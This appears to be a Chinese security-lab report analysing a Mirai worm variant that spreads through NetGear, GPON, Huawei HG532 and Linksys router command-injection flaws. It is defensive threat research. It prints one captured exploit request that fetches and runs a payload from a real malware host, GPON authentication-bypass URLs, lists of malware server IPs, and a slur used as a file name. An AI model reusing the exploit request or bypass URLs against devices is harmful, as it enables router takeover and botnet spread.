IoT 分析 | 路由器漏洞频发,mirai 新变种来袭

  作者:murphyzhang、xmy、hjchjcjh

  前言:

  近期腾讯安全云鼎实验室听风威胁感知平台监测发现一款攻击路由器的蠕虫病毒,经过分析,认定此款蠕虫是 mirai 病毒的变种,和之前的 mirai 病毒不同,该蠕虫不仅仅通过初代 mirai 使用的 telnent 爆破进行攻击,更多通过路由器漏洞进行攻击传播。通过溯源可以发现,本次捕获的蠕虫来自于美国拉斯维加斯的一位名为 Philly 的黑客。

  一、Playload 与漏洞分析

  样本在传播和攻击过程中涉及到4个 PlayLoad ,均针对路由器进行攻击,我们会对相关漏洞做一个抽样 的介绍和分析。

  表 PlayLoad 情况 ▽

  

被攻击设备

设备型号

漏洞编号

NetGear路由器

DGN1000、DGN2000

CNNVD-201306-024

GPON光纤路由器

H640GR-02、H640GV-03、H640GW-02、H640RW-02、H645G

CVE-2018-10561/62

华为HG532系列路由器

HG532

CVE-2017-17215

linksys多款路由器

Cisco Linksys E4200 、EA4500、EA3500、EA2700、E1000、E2100L

CNVD-2014-01260

  图 影响设备分布 ▽

  

  数据来源:腾讯安全云鼎实验室

  上图是几款路由器漏洞影响的国家范围,中国、俄罗斯、日本和美国是受灾较为严重的国家。与国家发展程度、网络普及程度有一定关系,与上述几款路由器的销售区域有着较强的关联。由于国产设备多,安全性不高等原因,我国未来 IoT 安全面临着巨大的挑战。

  下面我们针对这四个漏洞分别进行介绍:

  01

  NetGear 路由器任意执行漏洞

  (CNNVD-201306-024)

  1)漏洞分析:

  POC 通过 GET 方法执行 setup.cgi,通过 todo 命令执行 syscmd,通过 syscmd 来执行下载和执行病毒的命令。

'GET/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://46.17.47.82/gvv+-O+/tmp/nigger;sh+nigger+netgear&curpath=/&currentsetting.htm=1 HTTP/1.1\r\n\r\n'

  代码如下:

  A、执行 setup.cgi 后执行 setup_main:

  

 

  B、使用 GET 和 POST 方法都可以提交 POC:

  

 

  Todo 参数后面直接调取相关的文件执行,没有做任何过滤,这里也是被利用的地方,直接调用 syscmd 来执行自己想要的命令。

  

 

  2)传播情况:

  图 NetGear DGN 设备远程任意命令执行漏洞攻击统计 ▽

  

 

  数据来源:腾讯安全云鼎实验室

  NetGear 漏洞在俄罗斯非常泛滥,可以推断 NetGear 设备在俄罗斯有很大的保有量。

  02

  GPON 光纤路由器命令执行漏洞

  (CVE-2018-10561/62)

  1)漏洞分析:

  设备上运行的 HTTP 服务器在进行身份验证时会检查特定路径,攻击者可以利用这一特性绕过任意终端上的身份验证。

  通过在 URL 后添加特定参数 ?images/,最终获得访问权限:

  http://ip:port/menu.html?images/

  http://ip:port/GponForm/diag_FORM?images/

  图 GPONPlayLoad ▽

  

 

  2)传播情况:

  图 GPON设备远程任意命令执行漏洞攻击统计 ▽

  

 

  数据来源:腾讯安全云鼎实验室

  此漏洞影响范围较广,对于中国,格鲁吉亚 还有埃及的影响较为广泛。中国美国的光纤发展迅速,埃及和格鲁吉亚受到中国影响,光纤发展速度也很快,也是他们受影响设备多的一个原因。

  03

  华为 HG532 系列路由器远程命令执行漏洞

  (CVE-2017-17215)

  1)漏洞分析:

  图 HG532 PlayLoad ▽

 

  我们可以观察 POC 首先提交一个身份认证信息,之后 upgrade 里面的 NewStatusURL 标签中执行了想要执行的命令。模块在 upnp 中,我们找到 upnp 模块,并找到 NEwStatusURL 标签,代码直接通过 SYSTEM 执行命令(upg -g -u %s -t ‘Firmware Upgrade....’),没有做任何过滤。

  

 

  2)传播情况:

  图 华为 HG532 设备远程命令执行漏洞攻击统计 ▽

  

 

  数据来源:腾讯安全云鼎实验室

  图 CVE-2017-17215 世界影响范围 ▽

  

 

  数据来源:腾讯安全云鼎实验室

  通过华为路由器的受感染情况,可以看出,华为 HG532 设备在中国、俄罗斯、日本 等国有较好的销量,日本和俄罗斯受到的影响更大,可见中国制造对周边国家有着较大的影响力。

  04

  Linksys 多款路由器 tmUnblock.cgi ttcp_ip 参数远程命令执行漏洞

  (CNVD-2014-01260)

  1)漏洞分析:

  多款Linksys路由器没有被正确过滤 'ttcp_ip' 参数值,在 tmUnblock.cgi 脚本的实现上存在安全漏洞,经过身份验证的远程攻击者可利用此漏洞执行任意命令。受影响产品包括但不局限于:

  E4200 E3200 E3000 E2500 E2100L E2000 E1550 E1500 E1200 E1000 E900 E300 WAG320N WAP300N WAP610N WES610N WET610N WRT610N WRT600N WRT400N WRT320N WRT160N WRT150N

  

 

  2)传播情况:

  图 Linksys 多款路由器设备远程命令执行漏洞攻击统计 ▽

  

 

  数据来源:腾讯安全云鼎实验室

  相关漏洞样本的下载地址很固定,基本分布于拉斯维加斯、新加坡、莫斯科和阿姆斯特丹这四个城市。针对路由器的黑产基本在这几个地方比较活跃。

  图 病毒服务器分布图 ▽

  

 

  数据来源:腾讯安全云鼎实验室

  详细的服务器分布信息如下表所示:

  表 捕获到的相关样本下载 IP 地址 ▽

  

漏洞

IP 地址

地理位置

GPON光纤路由器命令执行漏洞(CVE-2018-10561/62)

205.185.122.121(l.ocalhost.host)

美国内华达州拉斯维加斯

46.29.163.28(cnc.methaddict.xyz)

俄罗斯莫斯科

46.17.47.82

俄罗斯莫斯科

46.29.166.125

俄罗斯莫斯科

194.182.65.56

捷克

128.199.137.201

新加坡

185.244.25.176

荷兰北荷兰省阿姆斯特丹

159.89.204.166

新加坡

206.189.12.31

荷兰北荷兰省阿姆斯特丹

128.199.222.37

新加坡

185.244.25.188

荷兰北荷兰省阿姆斯特丹

185.223.163.17

爱沙尼亚

142.93.175.10

德国黑森州法兰克福

46.183.218.247

拉脱维亚

185.244.25.194

荷兰北荷兰省阿姆斯特丹

176.32.33.123

俄罗斯莫斯科

华为 HG532 系列路由器远程命令执行漏洞(CVE-2017-17215)

209.141.33.86

美国内华达州拉斯维加斯

167.88.161.40

美国内华达州拉斯维加斯

213.183.63.181

保加利亚索非亚市州索非亚

195.62.53.38

俄罗斯莫斯科

Linksys多款路由器tmUnblock.cgi ttcp_ip参数远程命令执行漏洞(CNVD-2014-01260)

209.141.33.119

美国内华达州拉斯维加斯

209.141.50.26

美国内华达州拉斯维加斯

185.244.25.222

荷兰北荷兰省阿姆斯特丹

  二、样本分析

  样本 md5:

  099b88bb74e9751abb4091ac4f1d690d

  源地址统计(112.28.77.217):13次,主要攻击了81、8080端口

  下载IP:46.17.47.82

  样本与 mirai 是同一个家族的样本,是 mirai 病毒的一个变种。代码结构和解密后的字符串均非常相似,不同的是此变种使用了3个路由器漏洞进行传播。

  Mirai bot 代码的结构如下:

  

 

  包含了攻击模块、扫描模块和结束模块三个大模块,此样本代码结构与 mirai 一样,只是相比增加了三种针对路由器的扫描模块。

  

 

  

 

  与以前的mirai不同,这里检测 /dev/watchdog,/dev/misc/watchdog, /dev/FTWDT101_watchdog,/dev/FTWDT101\ watchdog,/dev/FTWDT101/watchdog,/sbin/watchdog,/bin/watchdog,/dev/watchdog0,/etc/default/watchdog,/etc/watchdog 等来避免重启。

  相比传统的mirai(/dev/watchdog,/dev/misc/watchdog)多了很多新的 watchdog 检测。

  同时包含了 Linux.Okiru 用来检测的路径(/dev/FTWDT101_watchdog,/dev/FTWDT101\ watchdog)。

  

 

  攻击服务器包含了很多相关的文件,各个操作系统平台上的,不同版本的文件。

  

 

  样本溯源:

  下图 POC 中包含了相关的下载地址:

  

 

  通过访问链接 46.17.47.82/cutie,发现其中包含了真正的下载链接。

  

 

  保存的路径为:

  /tmp/gdf,/tmp/gxy,/tmp/dhf,/tmp/ttb;

  再直接访问根目录,包含了一条 Twitter 地址:

  

 

  该 Twitter 的作者 Philly 是一个美国人,病毒存放的路径为 nigr(Philly 的自称),从 Twitter 中未发现直接与蠕虫相关的推文。

  图 相关 Twitter 截图 ▽

  

 

  关于样本捕获:

  通过腾讯安全云鼎实验室听风威胁感知平台进行捕捉样本,听风威胁感知平台是云鼎实验室在全球多个节点部署的蜜罐网络集群,用于捕获真实的恶意流量,每天捕获数亿次的各类攻击请求。

  相关捕捉界面如下:

  

 

  参考文档:

  https://www.freebuf.com/vuls/171457.html

  https://www.linuxidc.com/Linux/2014-02/97171.htm

  https://xlab.tencent.com/cn/2018/01/05/a-new-way-to-exploit-cve-2017-17215/

  腾讯安全云鼎实验室 关注云主机与云内流量的安全研究和安全运营。利用机器学习与大数据技术实时监控并分析各类风险信息,帮助客户抵御高级可持续攻击;联合腾讯所有安全实验室进行安全漏洞的研究,确保云计算平台整体的安全性。相关能力通过腾讯云开放出来,为用户提供黑客入侵检测和漏洞风险预警等服务,帮助企业解决服务器安全问题。

  

上一篇:汉威科技集团燃气安全监管物联网平台落地南京江宁!

下一篇:第二届小米IoT安全峰会来啦!时间、地点、日程介绍!

延伸阅读